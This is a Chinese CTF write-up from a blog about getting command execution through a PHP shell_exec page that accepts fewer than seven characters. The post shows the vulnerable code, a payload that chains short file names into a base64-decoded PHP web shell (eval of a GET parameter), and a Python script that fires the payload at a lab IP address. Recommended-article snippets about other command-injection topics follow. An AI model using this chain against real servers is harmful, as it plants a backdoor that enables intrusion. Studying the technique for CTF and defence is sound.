7位可控字符下的任意命令执行

最新推荐文章于 2023-06-27 15:56:10 发布
最新推荐文章于 2023-06-27 15:56:10 发布
阅读量4.7k 收藏 13
点赞数 3
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/102873187
版权

题目源码:

<?php

highlight_file(__FILE__);
if(strlen($_GET[1]<7)){
    echo strlen($_GET[1]);
    echo '<hr/>';
    echo shell_exec($_GET[1]);
}else{
    exit('too long');
}

?>

预备知识:

>a    #虽然没有输入但是会创建a这个文件
ls -t    #ls基于基于事件排序(从晚到早)
sh a    #sh会把a里面的每行内容当作命令来执行
使用|进行命令拼接    #l\ s    =    ls
base64    #使用base64编码避免特殊字符

写入语句

<?php eval($_GET[1]);

base64编码后

PD9waHAgZXZhbCgkX0dFVFsxXSk7

需要被执行的语句:

echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php

payload:

>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0

脚本代码:

#!/usr/bin/python
# -*- coding: UTF-8 -*-


import requests

url = "http://192.168.61.157/rce.php?1={0}"
print("[+]start attack!!!")
with open("payload.txt","r") as f:
	for i in f:
		print("[*]" + url.format(i.strip()))
		requests.get(url.format(i.strip()))

#检查是否攻击成功
test = requests.get("http://192.168.61.157/1.php")
if test.status_code == requests.codes.ok:
	print("[*]Attack success!!!")

大方子
关注
  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
PHP在linux上执行外部命令的方法
10-20
- **system()** 函数:`system()` 会直接显示命令的输出,并返回状态码,可用于简单的命令执行和查看结果。例如: ```php system("pwd", $result); echo $result; ``` - **passthru()** 函数:`passthru()` ...
网络安全原理与应用:windows命令执行漏洞演示.pptx
05-16
开发者应确保对用户输入进行充分的验证和过滤,避免直接将用户可控的数据传递给系统命令。同时,系统管理员应定期更新和修补系统,以减少潜在的安全风险。对于企业而言,部署入侵检测系统和防火墙,以及进行定期的...
数固定可控字符任意命令执行
东方
09-03 712
文章目录15长度:七个字符: 15长度: 思路分两种: 1 是直接写 2 是从外部服务器下载 比如 限制字数没有限制次数: 依次追加写入就好了~~ 七个字符: p神写的牛逼! ...
gentos 执行sh文件_CTFweb类型(十九)15、7可控字符下的任意命令执行
weixin_39625586的博客
11-04 272
点击上方蓝色字体,关注我们某些特殊情况下命令执行的Getshell中对应某个函数的内容可控可控字符长度分为长可控和短可控。我们先来看15个字符可控。条件:get方式传值,能够传的最大字符串数是14个,传shell_exec思路:如果要getshell,相当于我们在里面写进去一个文件。这个文件是来自于我们服务器发给目标服务器,或者说是除我们之外的其它服务器在带给目标服务器的。如果是从其...
任意命令执行
09-20 470
任意命令执行原因:   当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。   脚本语言(如PHP)优点是简洁、方便,但也伴随着一些问题,如速度慢、无法接触系统底层,如果我们开发的应用(特别是企业级的一些应...
关于linuxPHP中可控字符任意命令执行的解题思路
qq_28429161的博客
07-21 289
首先审计一下代码 当时在写环境的时候我把if语句里面打成了strlen($_GET[1]<7),然后测试了半天,一搞就是卧槽怎么能正常输出?!!!把代码给群里的水友看了一下卧槽写错了,汗- -。 这道题将可以输入的字符控制在了6,所以在我们正常输入的时候一次性无法使用一长串代码去查看flag文件。 通过一段简短的代码可以看出flag文件就在网站根目录的上一层,现在要像个办法突破可控。 不行…… 但是在学过linux命令的小伙伴都晓得,linux命令是可以使用"\"拼接的,所以试试这个方法 为
LangChain 任意命令执行(CVE-2023-34541)
最新发布
蚁景网安学院
06-27 1227
LangChain是一个用于开发由语言模型驱动的应用程序的框架。在LangChain受影响版本中,由于load_prompt函数加载提示文件时未对加载内容进行安全过滤,攻击者可通过构造包含恶意命令的提示文件,诱导用户加载该文件,即可造成任意系统命令执行
02命令执行代码注入漏洞.pptx
09-23
这类漏洞的根本原因是程序在设计时没有遵循数据与代码分离的原则,允许用户可控的数据直接参与到代码执行过程中。例如,PHP中的`system`、`exec`和`passthru`函数,Java的`Runtime.getRuntime().exec(...)`,以及ASP...
Evaluator:PocketMine-MP插件,可让您使用命令执行任意代码。 不要在生产服务器上使用它!
05-12
因为任何能够发送命令的用户,理论上都能够执行任意代码,这可能导致服务器被黑客控制、数据泄露或者其他安全问题。 使用Evaluator时,务必注意以下几点安全事项: 1. **仅限测试环境**:此插件绝对不应用于生产...
java 中轻松实现 执行windows系统命令
10-30
`ProcessBuilder`类还提供了其他一些方法,如`directory()`用于设置命令执行的目录,`redirectInput()`, `redirectOutput()`, `redirectError()`用于重定向输入、输出和错误流,以及`start()`方法用于启动进程。...
任意命令执行漏洞分析和防御
1ance's blog
05-18 1555
目录简介函数命令执行函数代码执行函数储备知识转义字符:多条命令执行注释符小技巧绕过空格过滤黑名单关键字执行无回显无字母数字构造命令 简介 1、命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 2、命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行 3、更常见的命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等 函数 命令执行函数 System:system
5可控字符下的命令执行
qq_45521281的博客
05-03 1630
遇到了这样一个题,这题是一个特别的命令执行题, 首先进去首页之后发现以下源码: <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) &...
poj2376 java_Java & PHP & Javascript 通用 RSA 加密 解密 (长字符串)
weixin_42143806的博客
02-24 1755
1 (function(global, factory) {2 typeof exports === ‘object‘ && typeof module !== ‘undefined‘ ?factory(exports) :3 typeof define === ‘function‘ && define.amd ? define([‘expo...
android graphic(19)—why Android's UI was designed the way it is and how it actually works
lyf's blog
03-30 9104
作者是google的framework工程师Dianne Hackborn。A few days ago I wrote a post trying to correct a lot of the inaccurate statements I have seen repeatedly mentioned about how graphics on Android works. This resul
WAS与WAS ND有什么区别?
热门推荐
shaofei的记事本
02-10 3万+
WAS与WAS ND有什么区别?
WAS 服务器负载测试软件使用说明
RainyLin-SunnyLin的专栏
12-25 1万+
WAS 服务器负载测试软件使用说明 ( Microsoft Web Application Stress Tool ) 一、建立新脚本     方法一、启动 WAS 软件后会自动显示建立新脚本的提示页面,选择 [manual] 按钮就可完成建立新脚本的功能。     方法二、启动 WAS 软件后点击 [new script] 按钮
555555555555555555555
qq_52431855的博客
12-26 940
密码学 第二题 好家伙这一题看起来挺简单,像 base64 加密,直接成功得到 flag
java:unicode转ascii_字符串转换ASCII码、Unicode码
weixin_39829166的博客
02-28 427
字符串转成16进制的ASCii码的值python:使用python 内置函数repr可以将非ascii码转换成\x**的样式,如下:>>>a='我们都是中国人'>>>printrepr(a)'\xe6\x88\x91\xe4\xbb\xac\xe9\x83\xbd\xe6\x98\xaf\xe4\xb8\xad\xe5\x9b\xbd\xe4\xba\x...
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值